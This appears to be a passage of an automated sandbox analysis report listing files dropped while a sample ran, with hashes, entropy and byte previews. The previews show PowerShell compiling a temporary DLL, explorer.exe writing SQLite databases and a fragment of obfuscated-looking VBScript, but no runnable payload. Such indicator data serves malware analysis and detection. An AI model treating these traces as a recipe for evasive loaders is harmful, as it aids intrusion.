                                                                                                                        MD5:F55A3D376DF4C84C27AC8B6337BAEAE0
                                                                                                                        SHA1:5EA1BD3BE84FC46CC8C9741DEE373E409774CE3B
                                                                                                                        SHA-256:65EE64591DE8A3926EB0EF9B6C668BFF0A5CCE93F0574E9D6133690BBD1FC632
                                                                                                                        SHA-512:36000CC27AB85878F093536CD4775B7A1915A24F5733905F5D2EE1441BDD3B33E0D0B35A5F7B0E4BC9F1060BBE2D2A396663B88FF9A116E0DA1DF734BF0E689A
                                                                                                                        Malicious:false
                                                                                                                        Preview:..p.r.i.v.a.t.e. .f.u.n.c.t.i.o.n. .C.r.e.a.t.e.S.e.s.s.i.o.n.(.w.s.m.a.n.,. .c.o.n.S.t.r.,. .o.p.t.D.i.c.,. .m.a.s.c.u.l.i.n.i.d.a.d.e.)..... . . . .d.i.m. .h.y.p.o.g.l.o.s.s.a.F.l.a.g.s..... . . . .d.i.m. .c.o.n.O.p.t. ..... . . . .d.i.m. .h.y.p.o.g.l.o.s.s.a..... . . . .d.i.m. .a.u.t.h.V.a.l..... . . . .d.i.m. .e.n.c.o.d.i.n.g.V.a.l..... . . . .d.i.m. .e.n.c.r.y.p.t.V.a.l..... . . . .d.i.m. .p.w..... . . . .d.i.m. .t.o.u.t..... . . . .'. .p.r.o.x.y. .i.n.f.o.r.m.a.t.i.o.n..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e..... . . . .d.i.m. .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m..... . . . .d.i.m. .p.r.o.x.y.A.u.t.h.e.n.t.i.c.a.t.i.o.n.M.e.c.h.a.n.i.s.m.V.a.l..... . . . .d.i.m. .p.r.o.x.y.U.s.e.r.n.a.m.e..... . . . .d.i.m. .p.r.o.x.y.P.a.s.s.w.o.r.d..... . . . . ..... . . . .h.y.p.o.g.l.o.s.s.a.F.l.a.g.s. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e. .=. .0..... . . . .p.r.o.x.y.A.c.c.e.s.s.T.y.p.e.V.a.l. .
                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):5829
                                                                                                                        Entropy (8bit):4.901113710259376
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:96:ZCJ2Woe5H2k6Lm5emmXIGLgyg12jDs+un/iQLEYFjDaeWJ6KGcmXlQ9smpFRLcUn:Uxoe5HVsm5emdQgkjDt4iWN3yBGHVQ9v
                                                                                                                        MD5:7827E04B3ECD71FB3BD7BEEE4CA52CE8
                                                                                                                        SHA1:22813AF893013D1CCCACC305523301BB90FF88D9
                                                                                                                        SHA-256:5D66D4CA13B4AF3B23357EB9BC21694E7EED4485EA8D2B8C653BEF3A8E5D0601
                                                                                                                        SHA-512:D5F6604E49B7B31C2D1DA5E59B676C0E0F37710F4867F232DF0AA9A1EE170B399472CA1DF0BD21DF702A1B5005921D35A8E6858432B00619E65D0648C74C096B
                                                                                                                        Malicious:false
                                                                                                                        Preview:PSMODULECACHE.....$...z..Y...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PowerShellGet.psd1........Uninstall-Module........inmo........fimo........Install-Module........New-ScriptFileInfo........Publish-Module........Install-Script........Update-Script........Find-Command........Update-ModuleManifest........Find-DscResource........Save-Module........Save-Script........upmo........Uninstall-Script........Get-InstalledScript........Update-Module........Register-PSRepository........Find-Script........Unregister-PSRepository........pumo........Test-ScriptFileInfo........Update-ScriptFileInfo........Set-PSRepository........Get-PSRepository........Get-InstalledModule........Find-Module........Find-RoleCapability........Publish-Script........$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module....
                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):64
                                                                                                                        Entropy (8bit):1.1628158735648508
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Nlllul7th:NllU
                                                                                                                        MD5:A865C8C0025271AA63FA51C6E19FBBEA
                                                                                                                        SHA1:41EB53653764E1A27A96204556271CE69504DA75
                                                                                                                        SHA-256:EC0DE7C97A7C5A3D4D04194415A953AE61443A91479BF194F807007375FD12FB
                                                                                                                        SHA-512:993EE7693877C94D48C295BC67D56003A58C9577DBE72126B36E8CD6293D31AF63A5B96A185CC5564FC2C40B3A253D39A186D34E4B478AE7C1BD5A623EA624FC
                                                                                                                        Malicious:false
                                                                                                                        Preview:@...e................................................@..........
                                                                                                                        Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                        File Type:SQLite 3.x database, user version 12, last written using SQLite version 3042000, page size 32768, writer version 2, read version 2, file counter 3, database pages 3, cookie 0x1, schema 4, UTF-8, version-valid-for 3
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):98304
                                                                                                                        Entropy (8bit):0.08235737944063153
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:DQAsfWk73Fmdmc/OPVJXfPNn43etRRfYR5O8atLqxeYaNcDakMG/lO:DQAsff32mNVpP965Ra8KN0MG/lO
                                                                                                                        MD5:369B6DD66F1CAD49D0952C40FEB9AD41
                                                                                                                        SHA1:D05B2DE29433FB113EC4C558FF33087ED7481DD4
                                                                                                                        SHA-256:14150D582B5321D91BDE0841066312AB3E6673CA51C982922BC293B82527220D
                                                                                                                        SHA-512:771054845B27274054B6C73776204C235C46E0C742ECF3E2D9B650772BA5D259C8867B2FA92C3A9413D3E1AD35589D8431AC683DF84A53E13CDE361789045928
                                                                                                                        Malicious:false
                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j......}..}...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):32768
                                                                                                                        Entropy (8bit):0.017262956703125623
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                        Malicious:false
                                                                                                                        Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                        File Type:data
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):32768
                                                                                                                        Entropy (8bit):0.017262956703125623
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:G8lQs2TSlElQs2TtPRp//:G0QjSaQjrpX
                                                                                                                        MD5:B7C14EC6110FA820CA6B65F5AEC85911
                                                                                                                        SHA1:608EEB7488042453C9CA40F7E1398FC1A270F3F4
                                                                                                                        SHA-256:FD4C9FDA9CD3F9AE7C962B0DDF37232294D55580E1AA165AA06129B8549389EB
                                                                                                                        SHA-512:D8D75760F29B1E27AC9430BC4F4FFCEC39F1590BE5AEF2BFB5A535850302E067C288EF59CF3B2C5751009A22A6957733F9F80FA18F2B0D33D90C068A3F08F3B0
                                                                                                                        Malicious:false
                                                                                                                        Preview:..-.....................................8...5.....-.....................................8...5...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 20, cookie 0xb, schema 4, UTF-8, version-valid-for 1
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):40960
                                                                                                                        Entropy (8bit):0.8553638852307782
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:48:2x7BA+IIF7CVEq8Ma0D0HOlf/6ykwp1EUwMHZq10bvJKLkw8s8LKvUf9KVyJ7h/f:QNDCn8MouB6wz8iZqmvJKLPeymwil
                                                                                                                        MD5:28222628A3465C5F0D4B28F70F97F482
                                                                                                                        SHA1:1BAA3DEB7DFD7C9B4CA9FDB540F236C24917DD14
                                                                                                                        SHA-256:93A6AF6939B17143531FA4474DFC564FA55359308B910E6F0DCA774D322C9BE4
                                                                                                                        SHA-512:C8FB93F658C1A654186FA6AA2039E40791E6B0A1260B223272BB01279A7B574E238B28217DADF3E1850C7083ADFA2FE5DA0CCE6F9BCABD59E1FFD1061B3A88F7
                                                                                                                        Malicious:false
                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 4, database pages 5, cookie 0x3, schema 4, UTF-8, version-valid-for 4
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):20480
                                                                                                                        Entropy (8bit):0.8517407251719497
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:TLyAF1kwNbXYFpFNYcw+6UwcQVXH5fBO4wxeHChWEE1:TeAFawNLopFgU10XJBOaT3
                                                                                                                        MD5:D0962B221779A756754334848DCFF184
                                                                                                                        SHA1:22CD3B9D687216E6921553F55958449CE7ABF05D
                                                                                                                        SHA-256:7BA5110096912E6B352060FFF79B07EA95CA114A13D3994D7814831DFAA649B8
                                                                                                                        SHA-512:05AFC25BA53913F0685075B6EC27A2A416168CB7A6D5C869D2F3DBA06AAD88633F1A709DD51AA1EDC946FF74E6271D9D3A5652FE4E0B8F226A452FDF6BAED36F
                                                                                                                        Malicious:false
                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j..........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 3, database pages 52, cookie 0x21, schema 4, UTF-8, version-valid-for 3
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):106496
                                                                                                                        Entropy (8bit):1.1368932887859682
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:ZWTblyVZTnGtgTgabTanQeZVuSVumZa6cF/k4:MnlyfnGtxnfVuSVumEHFs4
                                                                                                                        MD5:9A534FD57BED1D3E9815232E05CCF696
                                                                                                                        SHA1:916474D7D073A4EB52A2EF8F7D9EF9549C0808A1
                                                                                                                        SHA-256:7BB87D8BC8D49EECAB122B7F5BCD9E77F77B36C6DB173CB41E83A2CCA3AC391B
                                                                                                                        SHA-512:ADE77FBBDE6882EF458A43F301AD84B12B42D82E222FC647A78E5709554754714DB886523A639C78D05BC221D608F0F99266D89165E78F76B21083002BE8AEFF
                                                                                                                        Malicious:false
                                                                                                                        Preview:SQLite format 3......@ .......4...........!......................................................j............1........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 1, database pages 25, cookie 0xe, schema 4, UTF-8, version-valid-for 1
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):51200
                                                                                                                        Entropy (8bit):0.8746135976761988
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:96:O8mmwLCn8MouB6wzFlOqUvJKLReZff44EK:O8yLG7IwRWf4
                                                                                                                        MD5:9E68EA772705B5EC0C83C2A97BB26324
                                                                                                                        SHA1:243128040256A9112CEAC269D56AD6B21061FF80
                                                                                                                        SHA-256:17006E475332B22DB7B337F1CBBA285B3D9D0222FD06809AA8658A8F0E9D96EF
                                                                                                                        SHA-512:312484208DC1C35F87629520FD6749B9DDB7D224E802D0420211A7535D911EC1FA0115DC32D8D1C2151CF05D5E15BBECC4BCE58955CFFDE2D6D5216E5F8F3BDF
                                                                                                                        Malicious:false
                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j.....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 5, cookie 0x5, schema 4, UTF-8, version-valid-for 7
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):20480
                                                                                                                        Entropy (8bit):0.6732424250451717
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:TLO1nKbXYFpFNYcoqT1kwE6UwpQ9YHVXxZ6HfB:Tq1KLopF+SawLUO1Xj8B
                                                                                                                        MD5:CFFF4E2B77FC5A18AB6323AF9BF95339
                                                                                                                        SHA1:3AA2C2115A8EB4516049600E8832E9BFFE0C2412
                                                                                                                        SHA-256:EC8B67EF7331A87086A6CC085B085A6B7FFFD325E1B3C90BD3B9B1B119F696AE
                                                                                                                        SHA-512:0BFDC8D28D09558AA97F4235728AD656FE9F6F2C61DDA2D09B416F89AB60038537B7513B070B907E57032A68B9717F03575DB6778B68386254C8157559A3F1BC
                                                                                                                        Malicious:false
                                                                                                                        Preview:SQLite format 3......@ ..........................................................................j...$......g..........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        Process:C:\Windows\SysWOW64\explorer.exe
                                                                                                                        File Type:SQLite 3.x database, last written using SQLite version 3042000, page size 2048, file counter 7, database pages 89, cookie 0x36, schema 4, UTF-8, version-valid-for 7
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):196608
                                                                                                                        Entropy (8bit):1.1211596417522893
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:192:r2qAdB9TbTbuDDsnxCkvSAE+WslKOMq+8wH0hL3kWieF:r2qOB1nxCkvSAELyKOMq+8wH0hLUZs
                                                                                                                        MD5:0AB67F0950F46216D5590A6A41A267C7
                                                                                                                        SHA1:3E0DD57E2D4141A54B1C42DD8803C2C4FD26CB69
                                                                                                                        SHA-256:4AE2FD6D1BEDB54610134C1E58D875AF3589EDA511F439CDCCF230096C1BEB00
                                                                                                                        SHA-512:D19D99A54E7C7C85782D166A3010ABB620B32C7CD6C43B783B2F236492621FDD29B93A52C23B1F4EFC9BF998E1EF1DFEE953E78B28DF1B06C24BADAD750E6DF7
                                                                                                                        Malicious:false
                                                                                                                        Preview:SQLite format 3......@ .......Y...........6......................................................j............W........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe
                                                                                                                        File Type:Intel 80386 COFF object file, not stripped, 3 sections, symbol offset=0x48a, 9 symbols, created Wed Oct 23 07:38:03 2024, 1st section name ".debug$S"
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):1328
                                                                                                                        Entropy (8bit):3.95917910146405
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:24:HJe9ERok2qHnwKjmfwI+ycuZhNhakSfPNnqSqd:Ek2qQKjmo1ulha39qSK
                                                                                                                        MD5:7EB903B5CEBF8DD40C3E630C7DEC2A4B
                                                                                                                        SHA1:0C596A63C68B4AF202F6F2ECDC914D59D44625B4
                                                                                                                        SHA-256:37241F18F23969FC0E8E757BBD90FB23FE419F04BCEFE8F98B814577FA37C24F
                                                                                                                        SHA-512:17804DB2AA8319E6EDC38896D26AF78E849DEC37C3AC6B7C69E32D667D254226979A2DCB8766454897CCF031CA6FF22286AE69914D58CA970DDD7339D832A1F1
                                                                                                                        Malicious:false
                                                                                                                        Preview:L.....g.............debug$S........L...................@..B.rsrc$01........X.......0...........@..@.rsrc$02........P...:...............@..@........R....c:\Users\user\AppData\Local\Temp\zrs0mlof\CSC43C4496BB9344E76B253EEAECE3B141.TMP..................-.U..a..a.5.,.S..........3.......C:\Users\user\AppData\Local\Temp\RES611F.tmp.-.<....................a..Microsoft (R) CVTRES.[.=..cwd.C:\Users\user\Desktop.exe.C:\Windows\Microsoft.NET\Framework\v4.0.30319\cvtres.exe.................................................0.......................H.......L...........H.........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...z.r.s.0.m.l.o.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.
                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):60
                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                        Malicious:false
                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):60
                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                        Malicious:false
                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):60
                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                        Malicious:false
                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):60
                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                        Malicious:false
                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):60
                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                        Malicious:false
                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):60
                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                        Malicious:false
                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):60
                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                        Malicious:false
                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):60
                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                        Malicious:false
                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):60
                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                        Malicious:false
                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:ASCII text, with no line terminators
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):60
                                                                                                                        Entropy (8bit):4.038920595031593
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                        MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                        SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                        SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                        SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                        Malicious:false
                                                                                                                        Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                        Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exe
                                                                                                                        File Type:MSVC .res
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):652
                                                                                                                        Entropy (8bit):3.075149871547553
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:12:DXt4Ii3ntuAHia5YA49aUGiqMZAiN5grySkak7YnqqRpPN5Dlq5J:+RI+ycuZhNhakSfPNnqX
                                                                                                                        MD5:D02D0A55F8E7611593618635AF2CEE53
                                                                                                                        SHA1:9D371E1910FA9E7BFD688D11F8FC372F090C83F0
                                                                                                                        SHA-256:442AC4C18378AC277CD29FA166D95FD3021E6422BE7AD2C5853D5BB24873086D
                                                                                                                        SHA-512:21768F17496E375D8ACE4B7EF28A4D031F460E5A9C91564D301E40192209C57E509B059B44CC2B7B6AF3959E4198E341B3A680244029C52D5FFCF0B3D19A0297
                                                                                                                        Malicious:false
                                                                                                                        Preview:.... ...........................L...<...............0...........L.4...V.S._.V.E.R.S.I.O.N._.I.N.F.O.............................?...........................D.....V.a.r.F.i.l.e.I.n.f.o.....$.....T.r.a.n.s.l.a.t.i.o.n...............S.t.r.i.n.g.F.i.l.e.I.n.f.o.........0.0.0.0.0.4.b.0...,.....F.i.l.e.D.e.s.c.r.i.p.t.i.o.n..... ...0.....F.i.l.e.V.e.r.s.i.o.n.....0...0...0...0...<.....I.n.t.e.r.n.a.l.N.a.m.e...z.r.s.0.m.l.o.f...d.l.l.....(.....L.e.g.a.l.C.o.p.y.r.i.g.h.t... ...D.....O.r.i.g.i.n.a.l.F.i.l.e.n.a.m.e...z.r.s.0.m.l.o.f...d.l.l.....4.....P.r.o.d.u.c.t.V.e.r.s.i.o.n...0...0...0...0...8.....A.s.s.e.m.b.l.y. .V.e.r.s.i.o.n...0...0...0...0...
                                                                                                                        Process:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                        File Type:C++ source, Unicode text, UTF-8 (with BOM) text, with very long lines (355)
                                                                                                                        Category:dropped
                                                                                                                        Size (bytes):470
                                                                                                                        Entropy (8bit):3.810012065365248
                                                                                                                        Encrypted:false
                                                                                                                        SSDEEP:6:V/DsYLDS81zujNFdMYQXReKJ8SRHy4HkOlmPe/HLZ2PQy:V/DTLDfu+XfHIlePIQy
                                                                                                                        MD5:4F57B272B8F8E24280784E2242B442A1
                                                                                                                        SHA1:768BA6D7A969A60A51E04F6C02E892A38AD6FFFF
                                                                                                                        SHA-256:49587487DC8B6AD4B87A341C311221FE9724D0B0F473510C0EBFB863239FFA13
